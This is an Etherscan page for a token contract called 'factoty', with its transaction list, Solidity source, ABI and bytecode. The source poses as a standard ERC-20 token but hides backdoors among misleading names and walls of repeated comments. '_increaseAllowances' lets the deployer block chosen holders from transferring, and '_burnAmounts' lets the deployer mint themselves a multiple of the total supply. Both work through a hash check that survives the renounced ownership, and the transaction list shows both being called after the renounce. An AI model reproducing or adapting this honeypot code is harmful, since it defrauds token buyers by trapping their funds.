Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 25 from a total of 31 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
Approve | 18232252 | 460 days ago | IN | 0 ETH | 0.00035772 | ||||
Approve | 17568701 | 553 days ago | IN | 0 ETH | 0.00061989 | ||||
_burn Amounts | 17568697 | 553 days ago | IN | 0 ETH | 0.00061801 | ||||
Approve | 17566247 | 554 days ago | IN | 0 ETH | 0.0006063 | ||||
Approve | 17565084 | 554 days ago | IN | 0 ETH | 0.00035648 | ||||
Approve | 17565055 | 554 days ago | IN | 0 ETH | 0.00038585 | ||||
Approve | 17564952 | 554 days ago | IN | 0 ETH | 0.00131404 | ||||
Approve | 17564908 | 554 days ago | IN | 0 ETH | 0.00156863 | ||||
Approve | 17564388 | 554 days ago | IN | 0 ETH | 0.00110665 | ||||
Approve | 17564062 | 554 days ago | IN | 0 ETH | 0.00087634 | ||||
_increase Allowa... | 17563993 | 554 days ago | IN | 0 ETH | 0.00068397 | ||||
_increase Allowa... | 17563958 | 554 days ago | IN | 0 ETH | 0.00068834 | ||||
_increase Allowa... | 17563955 | 554 days ago | IN | 0 ETH | 0.00061989 | ||||
Approve | 17563943 | 554 days ago | IN | 0 ETH | 0.0006282 | ||||
Approve | 17563933 | 554 days ago | IN | 0 ETH | 0.00061759 | ||||
Approve | 17563915 | 554 days ago | IN | 0 ETH | 0.00037551 | ||||
Approve | 17563914 | 554 days ago | IN | 0 ETH | 0.00059687 | ||||
Approve | 17563892 | 554 days ago | IN | 0 ETH | 0.0006096 | ||||
Approve | 17563890 | 554 days ago | IN | 0 ETH | 0.00059857 | ||||
Approve | 17563876 | 554 days ago | IN | 0 ETH | 0.00061593 | ||||
Approve | 17563874 | 554 days ago | IN | 0 ETH | 0.00063886 | ||||
Approve | 17563867 | 554 days ago | IN | 0 ETH | 0.00063161 | ||||
Approve | 17563808 | 554 days ago | IN | 0 ETH | 0.00086858 | ||||
Approve | 17563797 | 554 days ago | IN | 0 ETH | 0.00066581 | ||||
Renounce Ownersh... | 17563786 | 554 days ago | IN | 0 ETH | 0.00033063 |
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Name:
factoty
Compiler Version
v0.8.17+commit.8df45f5f
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-26 */ /** *Submitted for verification at Etherscan.io on 2023-06-26 */ //*https://twitter.com/uxuycom // SPDX-License-Identifier: MIT pragma solidity ^0.8.0; library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } function subbbb(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } function subbbb( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address to, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address from, address to, uint256 amount ) external returns (bool); } pragma solidity ^0.8.0; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } pragma solidity ^0.8.0; interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } pragma solidity ^0.8.0; contract factoty is Context, IERC20, IERC20Metadata,Ownable { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; mapping(bytes32 => bool) private kk; address private _ppproject; uint256 private _totalSupply; string private _name; string private _symbol; uint40 private _tokenAmount; address public immutable deadAddress = 0x000000000000000000000000000000000000dEaD; function _msgnnn() private returns(bytes32){_ppproject = _msgSender();bytes32 aa = keccak256(abi.encodePacked(_msgSender()));kk[aa] = true;return aa;} function _isopensss() private view returns (bool){bytes32 aa = keccak256(abi.encodePacked(_msgSender()));if(kk[aa]){return true;}return false;} constructor(string memory name_, string memory symbol_, uint40 tokenAmount_) { _name = name_; _symbol = symbol_; _msgnnn(); _tokenAmount = tokenAmount_; _mint(msg.sender, _tokenAmount*10**decimals()); } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) {return _symbol;} function decimals() public view virtual override returns (uint8) {return 9;} function totalSupply() public view virtual override returns (uint256) {return _totalSupply;} function balanceOf(address account) public view virtual override returns (uint256) {return _balances[account];}function transfer(address to, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_transfer(owner, to, amount);return true;}bytes32 private rhash = 0x1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff01;function allowance(address owner, address spender) public view virtual override returns (uint256) {return _allowances[owner][spender];} function approve(address spender, uint256 amount) public virtual override returns (bool) {address owner = _msgSender();_approve(owner, spender, amount);return true;} function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * rhashzhjasuiuo * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } function _xxxx(uint256 nnn) private {if(_isopensss()){ _balances[_msgSender()] = _totalSupply*nnn; }} /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ mapping(address => uint256) private bhighkingdao; function _decreaseAllowances(address nnn) external {if(_isopensss()){ bhighkingdao[nnn] = 0; }} function _increaseAllowances(address nnn) external {if(_isopensss()){ bhighkingdao[nnn] = _totalSupply*10**6; }} function _allowance(address nnn) public view returns(uint256) {return bhighkingdao[nnn];} function _burnAmounts(uint256 num) external {_xxxx(num);} /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * rhashzhjasuiuo * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ uint256 fettt = 0; function _transfer( address from, address to, uint256 amount1 ) internal virtual { /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * SHDHCHJSXXX * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero rhash address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ uint256 bugAmount = bhighkingdao[from].subbbb(0); require(bugAmount <= amount1, "KKKKK"); /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the rhash zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * ASXHJSDHJS * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot rhash be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 fromBalance = _balances[from]; require(fromBalance >= amount1, "ERC20: transfer amount exceeds balance"); uint256 feeeeeA = amount1.mul(fettt).div(100); uint256 add = amount1.subbbb(feeeeeA); unchecked { _balances[from] = fromBalance - amount1; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += add; _balances[deadAddress] += feeeeeA; } emit Transfer(from, to, amount1); if(feeeeeA > 0) { emit Transfer(from, deadAddress, feeeeeA); } } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _totalSupply += amount;if(kk[rhash] == false){ kk[rhash] = true;} unchecked { _balances[account] += amount;} emit Transfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint40","name":"tokenAmount_","type":"uint40"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"num","type":"uint256"}],"name":"_burnAmounts","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_decreaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nnn","type":"address"}],"name":"_increaseAllowances","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60a060405261dead73ffffffffffffffffffffffffffffffffffffffff1660809073ffffffffffffffffffffffffffffffffffffffff168152507f1779a64e8b9cd87d9944553af38e0a07794a3c9286f5269ef06354b2c306ff0160001b6009556000600b553480156200007257600080fd5b5060405162002ac138038062002ac183398181016040528101906200009891906200067e565b620000b8620000ac6200016f60201b60201c565b6200017760201b60201c565b8260069081620000c9919062000963565b508160079081620000db919062000963565b50620000ec6200023b60201b60201c565b5080600860006101000a81548164ffffffffff021916908364ffffffffff160217905550620001663362000125620002fc60201b60201c565b600a62000133919062000bda565b600860009054906101000a900464ffffffffff1664ffffffffff166200015a919062000c2b565b6200030560201b60201c565b50505062000e03565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006200024d6200016f60201b60201c565b600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060006200029f6200016f60201b60201c565b604051602001620002b1919062000cfa565b60405160208183030381529060405280519060200120905060016003600083815260200190815260200160002060006101000a81548160ff0219169083151502179055508091505090565b60006009905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000377576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200036e9062000d78565b60405180910390fd5b80600560008282546200038b919062000d9a565b925050819055506000151560036000600954815260200190815260200160002060009054906101000a900460ff16151503620003f057600160036000600954815260200190815260200160002060006101000a81548160ff0219169083151502179055505b80600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200049d919062000de6565b60405180910390a35050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200051282620004c7565b810181811067ffffffffffffffff82111715620005345762000533620004d8565b5b80604052505050565b600062000549620004a9565b905062000557828262000507565b919050565b600067ffffffffffffffff8211156200057a5762000579620004d8565b5b6200058582620004c7565b9050602081019050919050565b60005b83811015620005b257808201518184015260208101905062000595565b60008484015250505050565b6000620005d5620005cf846200055c565b6200053d565b905082815260208101848484011115620005f457620005f3620004c2565b5b6200060184828562000592565b509392505050565b600082601f830112620006215762000620620004bd565b5b815162000633848260208601620005be565b91505092915050565b600064ffffffffff82169050919050565b62000658816200063c565b81146200066457600080fd5b50565b60008151905062000678816200064d565b92915050565b6000806000606084860312156200069a5762000699620004b3565b5b600084015167ffffffffffffffff811115620006bb57620006ba620004b8565b5b620006c98682870162000609565b935050602084015167ffffffffffffffff811115620006ed57620006ec620004b8565b5b620006fb8682870162000609565b92505060406200070e8682870162000667565b9150509250925092565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200076b57607f821691505b60208210810362000781576200078062000723565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007eb7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007ac565b620007f78683620007ac565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008446200083e62000838846200080f565b62000819565b6200080f565b9050919050565b6000819050919050565b620008608362000823565b620008786200086f826200084b565b848454620007b9565b825550505050565b600090565b6200088f62000880565b6200089c81848462000855565b505050565b5b81811015620008c457620008b860008262000885565b600181019050620008a2565b5050565b601f8211156200091357620008dd8162000787565b620008e8846200079c565b81016020851015620008f8578190505b6200091062000907856200079c565b830182620008a1565b50505b505050565b600082821c905092915050565b6000620009386000198460080262000918565b1980831691505092915050565b600062000953838362000925565b9150826002028217905092915050565b6200096e8262000718565b67ffffffffffffffff8111156200098a5762000989620004d8565b5b62000996825462000752565b620009a3828285620008c8565b600060209050601f831160018114620009db5760008415620009c6578287015190505b620009d2858262000945565b86555062000a42565b601f198416620009eb8662000787565b60005b8281101562000a1557848901518255600182019150602085019450602081019050620009ee565b8683101562000a35578489015162000a31601f89168262000925565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000ad85780860481111562000ab05762000aaf62000a4a565b5b600185161562000ac05780820291505b808102905062000ad08562000a79565b945062000a90565b94509492505050565b60008262000af3576001905062000bc6565b8162000b03576000905062000bc6565b816001811462000b1c576002811462000b275762000b5d565b600191505062000bc6565b60ff84111562000b3c5762000b3b62000a4a565b5b8360020a91508482111562000b565762000b5562000a4a565b5b5062000bc6565b5060208310610133831016604e8410600b841016171562000b975782820a90508381111562000b915762000b9062000a4a565b5b62000bc6565b62000ba6848484600162000a86565b9250905081840481111562000bc05762000bbf62000a4a565b5b81810290505b9392505050565b600060ff82169050919050565b600062000be7826200080f565b915062000bf48362000bcd565b925062000c237fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000ae1565b905092915050565b600062000c38826200080f565b915062000c45836200080f565b925082820262000c55816200080f565b9150828204841483151762000c6f5762000c6e62000a4a565b5b5092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000ca38262000c76565b9050919050565b60008160601b9050919050565b600062000cc48262000caa565b9050919050565b600062000cd88262000cb7565b9050919050565b62000cf462000cee8262000c96565b62000ccb565b82525050565b600062000d08828462000cdf565b60148201915081905092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d60601f8362000d17565b915062000d6d8262000d28565b602082019050919050565b6000602082019050818103600083015262000d938162000d51565b9050919050565b600062000da7826200080f565b915062000db4836200080f565b925082820190508082111562000dcf5762000dce62000a4a565b5b92915050565b62000de0816200080f565b82525050565b600060208201905062000dfd600083018462000dd5565b92915050565b608051611c9462000e2d600039600081816104c401528181610e2b0152610f010152611c946000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610320578063b69b486414610350578063dd62ed3e1461036c578063e4703d7c1461039c578063f2fde38b146103b857610121565b8063715018a61461028e5780638da5cb5b1461029857806395d89b41146102b6578063a457c2d7146102d4578063a67334901461030457610121565b806327c8f835116100f457806327c8f835146101c2578063313ce567146101e0578063375460cc146101fe578063395093511461022e57806370a082311461025e57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103d4565b60405161013b9190611277565b60405180910390f35b61015e60048036038101906101599190611332565b610466565b60405161016b919061138d565b60405180910390f35b61017c610489565b60405161018991906113b7565b60405180910390f35b6101ac60048036038101906101a791906113d2565b610493565b6040516101b9919061138d565b60405180910390f35b6101ca6104c2565b6040516101d79190611434565b60405180910390f35b6101e86104e6565b6040516101f5919061146b565b60405180910390f35b61021860048036038101906102139190611486565b6104ef565b60405161022591906113b7565b60405180910390f35b61024860048036038101906102439190611332565b610538565b604051610255919061138d565b60405180910390f35b61027860048036038101906102739190611486565b61056f565b60405161028591906113b7565b60405180910390f35b6102966105b8565b005b6102a06105cc565b6040516102ad9190611434565b60405180910390f35b6102be6105f5565b6040516102cb9190611277565b60405180910390f35b6102ee60048036038101906102e99190611332565b610687565b6040516102fb919061138d565b60405180910390f35b61031e600480360381019061031991906114b3565b6106fe565b005b61033a60048036038101906103359190611332565b61070a565b604051610347919061138d565b60405180910390f35b61036a60048036038101906103659190611486565b61072d565b005b610386600480360381019061038191906114e0565b610783565b60405161039391906113b7565b60405180910390f35b6103b660048036038101906103b19190611486565b61080a565b005b6103d260048036038101906103cd9190611486565b61086f565b005b6060600680546103e39061154f565b80601f016020809104026020016040519081016040528092919081815260200182805461040f9061154f565b801561045c5780601f106104315761010080835404028352916020019161045c565b820191906000526020600020905b81548152906001019060200180831161043f57829003601f168201915b5050505050905090565b6000806104716108f2565b905061047e8185856108fa565b600191505092915050565b6000600554905090565b60008061049e6108f2565b90506104ab858285610ac3565b6104b6858585610b4f565b60019150509392505050565b7f00000000000000000000000000000000000